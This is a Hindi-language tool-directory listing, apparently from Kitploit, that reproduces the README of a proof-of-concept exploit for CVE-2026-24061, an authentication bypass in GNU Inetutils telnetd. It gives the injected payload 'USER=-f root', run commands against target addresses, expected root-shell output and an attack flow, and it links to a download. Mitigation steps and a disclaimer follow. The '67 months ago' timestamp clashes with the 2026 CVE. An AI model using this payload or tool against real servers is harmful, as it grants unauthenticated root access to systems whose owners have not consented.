Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — CVE-2026-24061 के लिए GNU Inetutils telnetd प्रमाणीकरण बाईपास का प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्राफ्टेड NEW-ENVIRON USER वेरिएबल के माध्यम से रूट शेल स्पॉन करता है। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरिमोट एक्सेस टूल
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

CVE-2026-24061 के लिए GNU Inetutils telnetd प्रमाणीकरण बाईपास का प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्राफ्टेड NEW-ENVIRON USER वेरिएबल के माध्यम से रूट शेल स्पॉन करता है।

रिपॉजिटरी देखें
67 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 अवलोकन

इस रिपॉजिटरी में GNU Inetutils telnetd रिमोट प्रमाणीकरण बायपास भेद्यता के लिए एक Proof‑of‑Concept एक्सप्लॉइट शामिल है।

यह समस्या इसलिए उत्पन्न होती है क्योंकि telnetd /bin/login को कॉल करने से पहले Telnet NEW‑ENVIRON नेगोशिएशन के माध्यम से प्राप्त USER पर्यावरण चर को ठीक से सैनिटाइज़ नहीं करता है।

निम्नलिखित आपूर्ति करके:

root@kitploit:~
USER=-f root

telnetd प्रभावी रूप से निष्पादित करता है:

root@kitploit:~
/bin/login -f root

जो प्रमाणीकरण को बायपास करता है और तुरंत रूट शेल उत्पन्न करता है।

  • उत्पाद: GNU Inetutils telnetd
  • प्रभावित संस्करण: ≤ 2.7
  • पोर्ट: 23/TCP
  • प्रमाणीकरण: आवश्यक नहीं
  • प्रभाव: प्रमाणीकरण बायपास → रूट शेल
  • विशेषाधिकार: root
  • CVE: CVE‑2026‑24061
  • CVSS: 9.8 (क्रिटिकल)

⚙️ तकनीकी विवरण

Telnet NEW‑ENVIRON क्लाइंट को सत्र नेगोशिएशन के दौरान पर्यावरण चर सेट करने की अनुमति देता है।

कमजोर telnetd USER को सीधे login को पास करता है:

root@kitploit:~
/bin/login -f "$USER"

एक हमलावर सेट करता है:

root@kitploit:~
USER=-f root

परिणाम:

root@kitploit:~
/bin/login -f root

-f फ्लैग login को प्रमाणीकरण छोड़ने के लिए कहता है, जिससे रूट एक्सेस मिल जाता है।


📦 आवश्यकताएँ

  • Python 3
  • telnetlib (मानक लाइब्रेरी)
  • कमजोर inetutils‑telnetd ≤ 2.7 चलाने वाला लक्ष्य
  • TCP/23 पर पहुंच योग्य Telnet सेवा

कोई बाहरी निर्भरता आवश्यक नहीं है।


🚀 उपयोग

1️⃣ एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ वैकल्पिक पोर्ट

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ अपेक्षित परिणाम

यदि कमजोर है:

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

अब आपके पास एक इंटरैक्टिव रूट शेल है।


🧪 उदाहरण

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

आउटपुट:

root@kitploit:~
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#

🧯 नोट्स

  • एक्सप्लॉइट तत्काल है
  • कोई ब्रूट फोर्स आवश्यक नहीं
  • कोई क्रेडेंशियल आवश्यक नहीं
  • वास्तविक दुनिया में शोषण देखा गया
  • डिफ़ॉल्ट Debian/Ubuntu inetutils‑telnetd इंस्टॉल पर काम करता है
  • यदि telnetd पैच किया गया है या बदला गया है (जैसे, OpenBSD telnetd) तो विफल हो जाता है

🛡️ शमन

  • GNU Inetutils ≥ 2.8 में अपग्रेड करें
  • Telnet सेवा अक्षम करें
  • SSH से बदलें
  • फ़ायरवॉल पर TCP/23 ब्लॉक करें
  • inetutils‑telnetd पैकेजों का ऑडिट करें

📊 PoC हमला प्रवाह

root@kitploit:~
sequenceDiagram
    participant A as Attacker
    participant T as Target telnetd
    participant L as /bin/login
    participant R as Root Shell

    A->>T: Connect TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Execute /bin/login -f root
    L-->>T: Auth bypass success
    T-->>R: Spawn root shell
    R-->>A: Interactive root session

⚠️ अस्वीकरण

यह एक्सप्लॉइट निम्नलिखित के लिए प्रदान किया गया है:

  • सुरक्षा अनुसंधान
  • अधिकृत पेनेट्रेशन परीक्षण
  • रक्षात्मक सत्यापन

उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति आपके पास नहीं है, अवैध है।

टूल डाउनलोड करें